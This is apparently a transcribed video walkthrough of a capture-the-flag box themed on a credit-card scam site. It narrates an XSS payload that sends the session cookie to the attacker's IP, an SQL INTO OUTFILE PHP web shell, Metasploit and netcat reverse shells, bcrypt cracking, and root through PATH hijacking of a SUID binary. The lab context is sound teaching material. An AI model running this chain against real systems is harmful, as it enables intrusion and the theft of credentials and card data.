Hello guys, welcome back to a Pentesting Club. Today we're going to solve another CTF challenge name called a credit card scams. So, what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. So, what is this CTF total? So it's this is a CTF which was conducted on COVID period. So there are a lot of like credit card scammers where they can post XYZ websites. It's look like real, but it's not like look like real. So where they can collect from call centers, and they want to swipe everything what they get from the call centers of their customers' data of their credit cards or debit cards. So we are going to hunt in that one and get to a root privilege access and stop that activities. So it's similar like a fun activities to doing this CTF challenge. So now let's get started. So first, open the terminal. So first, you just type as sudo su, enter your password, then you just type as net discord minus I is 0. So first we would like to identify our target machine. So I have identified my target machine is here. Now let's I just click here. Now just type it as nmap minus 34 minus a as an aggressive scan and enter our targeted IP address. So let's wait for the nmap result. So here have a both two with the same identity. So don't need to confuse this one. Now let's wait for this nmap result. I have got the nmap result. One is available with SH, another one is available with the port 80, and another one is available with the 443. Now we would like to come back to your targeted IP address. So just put here as 192.168.18.90. So where you can see your PPE shop, buy your PPE. And now you stay protected, quick and secure delivery, all equipments made to a good safety and standards. Now let's try to look the pesos. In these pesos, there is nothing else as useful information. That's it here. It was like a Java query. Okay, we just close this. So you just click on anything else you try to purchase. Now, it is there. Now we just try to execute a script command as access payload. I just put here as alert, need to give as PCP Alex. Now let me just close this. I just close the script tag. That's it here. Now entirely just copy and paste it here. That's it. Here. So every places is just paste here. In a real-time case scenario, in a contact page, you just try to get here as a script tag, then try to submit the query. You didn't get any output results. That's well and good. Now we would like to come back here. You just try here as first open a new tab. Now we just also open a new tab. Now I just need to set up a Python -f http.a server. Now it was running. No, I don't want to run this 8000. I just run as 80. Now let's come back here. Now you just look here as a config. So this is your targeted IP address. So you just copy. Now I have created a script tag. So for that, for your viewing, I can show you here. So you can look here a script document.write image source with my targeted IP address plus document.cookie and width equal to 0, height equal to 0 and border equal to 0, and I just close that tag, then I close the script tag. So I just entirely just copy this one. Now we would like to walk to here. Now we just try to put here everything. Just put in every places. Just try to put in this. Now try to submit the query. Now we can look here in this place. I have got here as a session identity. Okay, so where we have identified our session identity, so you just keep it like that. Now we have got our session identity, that is we are getting like HTTP 1 is to 1.1. Now later we would like to come back here, we just type here as clear, we would like to go with the directory master HTTP and here our target IP address 192.168.18.90. That's it. So where I have got here as a admin, let's we just copy this, come back here, let's we just try to visit to the admin page. So where you can see here a dist, I have got here directly as a login page. Now let's we just inspect the elements here. We just click on the network tab. Now just try here as a admin and admin. I try to log in as a default. It's get like a post as document and it was given as error. So in this case we just click on a storage where a cookie is totally a different. Now we try to modify here as this cookie. Let's just this is an session identity. We just copy this one, come back, we just paste it here, just paste it, then try to a refresh. We can't able to log in here. Okay, that's great. That's quite interesting here. Now we would like to go with as pubsert. Now once we go to as pubsert, let it launch this. Then just okay. Now just click on next and start the pubsert. Now click on proxy. In the proxy tab, we just make it as interception is up, and here also. Let's just click to an pubsert. Then you just try here as a admin admin. That's it. In this case, now let's just try to a login. So where you have here as a admin, you just delete this and this also. Where you have got it here. Now you just need to change that targeted session identity. Now once you have done this one, now try to click on forward. Now you can see here where you have successfully logged in your targeted thing with your session identity. Now you just minimize this where you have got it also the script tag that is executed. Now just click on OK. Does not allow OK. Okay, so I just I can see here name of the card numbers, bulk database. I have got it here entirely. You can see here every card holder information we have got it here, and their credit card numbers, XYZ things. They use somewhat Amex, somewhat XYZ things, where we have got it everything. Now let's we just come back to a database admin. Now this page allows you to execute a SQL command and deleting and achieving a data. It looks like we can execute a SQL commands from here. I would really would like to try as SQL. Now let's we would like to try here as we would like to try here as I just put here as a select star from users, then try to execute this database execution error execution. This allows, so I don't get any useful information here. So in this case, if you not get anything else, now let I would like to write here as something. Now I just put here as select where I would like to get it is in, like I would like to identify as a PHP. I would like to know as a PHP PHP info. Let's just close this. Then and I would like to close this a PHP. Then you just put as into as out file. I would like to get the output file as where www html. Then let me just go as a info.php php info .php. That's it. Then let's just close this. So now let me just copy this. Then I try to execute here. In this case, I not get anything else here. Dashboard, database admin. That's it. I'm not getting here. Now, which I was executed over there. Now, let's we just go back here. I just enter our targeted IP address. So just put as php info dot php. Yes, I have successfully got it here. Now, in our where www.html, where I have got here. Now we can execute this directly. Where you can look like file upload is also on. You can utilize this one file upload. It may be take a lengthy time process to utilize this file upload. So if we have a PHP info, now we would like to come back here. Now let's just type here as clear. Just type here as MSF console. We would like to try to get we would like to create a PHP payload first for this to execute as in the web delivery. Now try to get this MSF console. Now I just open as one more tab. I just put here as a ifconfig. So this is my target IP address. I just copy here. Now we just try to use a let's load this first. Now just try for us use exploit multi script and just try for us web delivery. Now we just stay here. Now I just type here as show options. Now I just type here as clear. Now I just put here as show options. So I just put first set a target for a PHP. That's our mandatory. So I just put as PHP. Now set payload is required. We just need to initiate the payload for PHP. Meter printer. Then you just type here as a reverse underscore TCP. Now you just put as set lcos equal to 192.168.18. My Kali Linux IP address. Now where is SRV port is I would like to mention as a set. I would like to put as SRV port SRV port equal to 8081. It's is optional, but if you require to running on the bug, uh, so it's an optional. Let's we just try. We are not running now anything as pub should. Now let's we just try to run this. Okay, so I have forgotten as something here. Let me, I just type it as clear. I just put as show options. Now this is everything okay. Now I just put as set SR uh, port equal to 8081. Now try to run this. Exploit failed. You must select a target. Okay, uh, I understand. So just try to show options. So you just need to look very carefully. Set target as a PHP. Now you just type here as run. Now I have got this entirely the PHP code. As we can see here, everything as a PHP where we have get it here. Now we would like to write here as this one. Now I would like to get entirely this one, this source code. Now just copy this one, this PHP. Now let me just come back here. Now again I would like to write here as select, then let's just paste this. So let me, I just uh, paste this as entirely as a PHP. As let me just paste this as PHP. So I think we don't require this to allow to open F or true. Now let me, I just okay. Now once this is done here, I just put here as a question mark and let us close this. Now I think we would like to write very clearly this one. Let's we just make it this one. Let me, I just close this. Now we just write here as a select. There. Let's just put here as with PHP. Now let's we just paste this. So in this case, I just need to put as PHP and verify as peer name, evaluate. So I just need to remove here as a mark. Now let's just put here is, so I'm just modifying a something here. Now I don't want to get this one. It's okay now. Now after this, You just need to save this one into, just put here as into out file. I just need to get as an output file as in this, where HTML, just copy, let's just shell.php. That's it. Once done, you just try to do this. Let's just entirely just copy this one. Now let's we just go back to here, then try to put here entirely. We just try to execute here. That was executed. Now once you have executed this one, now we just need to wait for this. Let's we just go back here. Now here you just try to visit a shell.php. That's it here. File not found. Okay. So where we have made a mistake, I think it not going to be worked out. 8080. So I think we just entirely just copy this one, come back. We just try to delete entirely this one. Now I have put here as a shell.php. So let's just entirely just copy. Then try to execute again. Try to execute. That was done. Now try to execute. No, the file is not going to be fine here. So how we are going to get the shell here? To get a shell here. Now for that we would like to try here as so. Otherwise we tried with this escalating Metasploit, it's not going to be worked out. Now I want to try my own parent. So this we just try utilizing this one. We just come back here, we just put here as select. Now let's we just put here as so. Let's just put as a PHP echo. I would like to execute a shell with the exec exploit. Then I will just put as $_get. Now in this case I just need to get a CMD. Let's just close this. Then close this also. Then here also. Now let's we just close this. We just put here as into out file where dot I would like to change the file name here. Now that's it. At the end where www HTML. Now just put here as pcpl .php. That's it. Now entirely just take this, just copy, come back here. Let's just paste it. Now this will execute 100% without fail. Now once you have done this, now where I have created here, now let's we just go to here as pcpl.php, where let me just try here as yes pcpl.php. We just put here as underscore cmd equal to en. environment. Now you can look here. I have successfully got here in the environment. User bin with environment. Where I have got here. Now you just type here as ID. So where we are getting here everything. So we have executed this one very successfully. Now our next task is, now let's come back here. So we have failed to execute with this PHP. So we just quit here. Let's type here as clear. Now we just put as netcat minus lvnp 7890. That's great. Now what you just need to execute here is as, now let's we just come back here. Now you just type here as which netcat here, not at give here. So let me just try here as uh, which Python. It's not giving here, so maybe it's working out. Let's me just try here as netcat minus e. I just put here as a bin as such. You just enter your targeted IP address 192.168.18.122.7890. Now it was got here already. It will get connected here. Now let's wait. I think we would like to need to get a connected now. I just type here as ID. We not yet get as connecting back to here. So this have a lot of errors here. How to try to connect this. So we failed to connect here. How we can try to connect again? So we just try here is, let's we just go back here. We just try to make as a URL encoder with this. So let's come back here. We just cut this. So now just type here as clear. Just put as netcat minus lvnp. Now just put as URL encoder. So in this does not require. Let's just close this. So we not yet get here to execute this. So with the same port, we just try it not going to be work out. We just try here as, I would like to try only as another thing. Now let's just write here as netcat minus e win, and I just type here as sh when, and carry our target. IP address is 192.168.18.122, and you just put as 443. let's just I just copy this. Now let's just we just type here as ls minus air, where you have got here everything. We just need to go for now again to an MySQL database is running over there on Apache server, and PHP info.php is running. That's it here. Now we just type here as uh, uh, ID we have got here. List admin bino.php css php info pcpl .php, and settings vendor, everything is available. Now we try to connect here. Let's we just try here is now let's we just try as let's just paste this. I have got connected. So don't try every time with uh, your own. So you just type ID, you got it here. Now just type here as which Python you have got it here. You not yet get it. Just type here as which Python 3. You not yet get here again. You just type here as which Python uh, 2.7. So I'm not getting anything else here after get connected to uh, this one. So now how should I can get here? Now where is I just don't need to give. I just put as where is Python. You can look here Python with the user being 7. So where there is a 2.7, you just type here as Python 2.7. Now just put here as -c, import pdy spad bin bash. So where I have come here directly to a bash now. Now you just type here as who am I? You just type here as export term equal to x term. Now I just type here as clear. Now I just type plus minus here. Now this is your pcpl.php vendors and everything. Now just go to a home directory. Now we would like to look everything. Now just type cd as admin, permission is denied, cd money grabber, permission is denied. So we are getting as permission is denied. Now let's we would like to look here as let's we just type here as clear. Now just type here as cd where now just type plus minus l. There is nothing else from here. Now just go to here as cd ww. Now just type here as clear. Just type plus minus l. Now just type here as cat a flag 1.txt. I have identified the flag 1. So just copy. So we have identified now a flag 1. Now let's be just try to go here. So we have the usernames like admin and money grabber. So we would like to try here good as again as HTML. Now just type it as clear. Now just type plus minus L. We just good as settings. Now just type plus minus L. Now just type it as cat a config.php. So where you have got here your database name and orders and database passwords, everything. Just copy this. So for your reference, so just paste here. Now now we would like to do here as now let's be just type here as clear. Now just type here as MySQL. Then users for orders password. Now enter your password. This is the password. Just entirely just copy, come back, then let's just paste it here. I have done. Now you just type here as show databases Now you just type you just type as use orders. Now you just type here as show a tables. Now where again I have got here everything like you just type here as select a star from I just read. So okay, no worries. Select star from users. I have got it here as two users as admin and this one two users and passwords. I have got it here. I just copy here and I can show you here. So these are the two users and passwords. Now for this case, I would like to utilize one is like money grabber. So first of all, I would like to try to go for as one by one. Let's just copy. Now let's we just come back here. You just type here as clear. You just type here as nano. You just put here as money. Let's just press this hash. Just type Control O, Control X. Now it's like a basic crypt. This type of hash. Let me. I can show you here. This type of hash I was done previously. So this type of this one is basic crypt. Let's try here as hash type. It's like a basic crypt. It's like basic crypt hash in a modular for crypt format. Okay. Now let's we just come back here. If you want to utilize the however, if you want to utilize the hashcat, it's also great. I would like to utilize a John. I would like to put as a format equal to a BC crypt. Now just put as a wordless user share wordless. Then you just put as directory buster. Oh sorry, I would like to put as a rocky.txt file. So in this thing, then you just put here as a money. That's it. It will try to crack the password. So it may take a little bit. So guys, now let's. We would like to look this. So it's take a lengthy time process to crack this password of a money. So let's. We would like to look here is money grabber. Now let's. We would like to try to go and get connected to this one. So now let's come back to a terminal. Let's come back here. You just type here as exit. Now just type here as cd. Otherwise you just type here as a clear. You just put here as list minus here. Oh, here is a money grabber. Now just copy this as money grabber. Come back to here. Now just type here as such. Now you just need to log in as with as such using as a money grabber. Enter your targeted IP address 192.168.18.90. It will ask permission. You just type yes. Money maker, please log in with the targeted of your password. Is this one Delta 1. Just press it. So it takes a lengthy time process to crack this thing. Now we just type here as cd list minus l. Now I have got here as cat a flag 2.txt. Here I have identified the flag 2. So let's look here, come back. So this is the flag 2 here. So we have identified the flag 2. Now we just need to get the last flag. So we already know this one as this. So now we would like to look here as, let's come back first here. Now we just need to look here as get a backup.sh. where you can look here tar minus cvf mysql.tar2 where alib.mysql sleep for 30 seconds. So this file looks like it runs a tar commands that backups up mysql directory. It may be worth seeing if that. Now we would like to look this, so just type here as clear, you just type here as y / minus prm minus u equal to s minus type f2 is greater than dev or null. Now this we'll check here. So we would like to utilize the first one. You can look here, user win su. That's well and good. Now, so we would like to go to as cd user win. Now we just type here as ls minus l. Now just type here as clear. I just put here as list where here is a backup for running. So just copy this. Now I just type here as clear. Now just type here as a strings as a backup. So the strings command basically print the printable characters within the file. When we run it on the backup binary, we can see a lot of output. And interestingly, we can see here. We would like to look here. This is with let's come back. Home, money with the grabber. So where we have seen here very interesting things. That we have is a binary like user bin backup that runs a privileged user. Once executed, that seems to be called like home money grabber backup.sh script. We can get a root privilege this way. If we can refer home to money grabber backup.sh file, we can see it run the tar command. We can also see it does not explicitly specify the path that the tar command is located in. So this is a CentOS OS. Linux has a lot of environment variables. One of the variable that is set a default specify where binaries are typically located, such as user bin, otherwise user s bin, etc. If a script runs a command but does not explicit the specify the path where the binary is located, then the system will reverse the path environment variable to see which folder to look into and run the command. So in this instance of Linux machine, as the tar command does not have the path to set the backup.sh, the systems look in the user bin and etc. So we try to find it and it can be executed. We can abuse this changing a path environment like uh, so when the script executed, it looks in a directory of our choosing of the tar binary and runs our own script rather than the true a tar binary as the user pin backup binary. As the SUID bit, we can get it to run a binary of our choosing located in a directory of our choosing elevated privilege. So we can check that one. Let me just type here as clear. I just put here echo dollars with a path. Now it will print here home with the money grabber, local with bin, home with the money grabber, bin, user local bin, everything we have got it here. Now I would like to export this one entirely. As we can see, there is a few directories here, so we can change it with the in the temp directory file. So For that, you just put here as a export path. I would like to export the path equal to in the temp directory. Now, I just put here as a user bin cd to a temp directory. Now, later, you just put here as user bin echo. Then I just put here as a bin bash. Now I just put here as a tar. Oh, sorry, I was made a mistake. I just need to put here as user bin echo. So it's not printing that one. So now what we would like to try here, if this is, I just type here as clear. I just put here as a export term equal to extra. I just type here as, no, it's not found. Now I would like to try here as, now we don't need to do here as cd go to a home directory. Now just type here as, so I just quit this. I just put here as exit. It was closed. Great. Now we just copy this, come back here, let's just paste it. So we have login here now successfully. Now once we have login here everything clearly, now we would like to try here, but it's not going through here. So now we just type here as echo as dollars as path. Now once I have got it here as a dollars as path, now you just type here as a export a path equal to in the temp directory, and you just need to also put as a dollars as a path, then and only it will work out. Now after you have put here, now you just put here as echo dollars path. Now you can see here before it's home you have directory. Now I have in the temp directory, so you just need to notice this. Now you just need to put here as echo you just put here as a bin bash, so not bash, so you just use a sh. Now I just put here as a temp as a tab. That's it. Now, you just need to give a permission for the chmod plus X in the temp as a tab. That's it. Now, you just type here as user win backup. I have successfully get the root access now. You can see a root directly. Now I just type who am I? We are in the root. You just type here as cd root. Just type plus minus a. I have file here. You just type here as cat a flag 3.txt. I have identified the flag 3 also. This is the flag 3. That's it. Let me again paste it. That's it. Flag 1, flag 2, flag 3. That's it. So we have successfully completed this mission. That's it. You can try your own guys. Thank you guys for watching and keep smiling.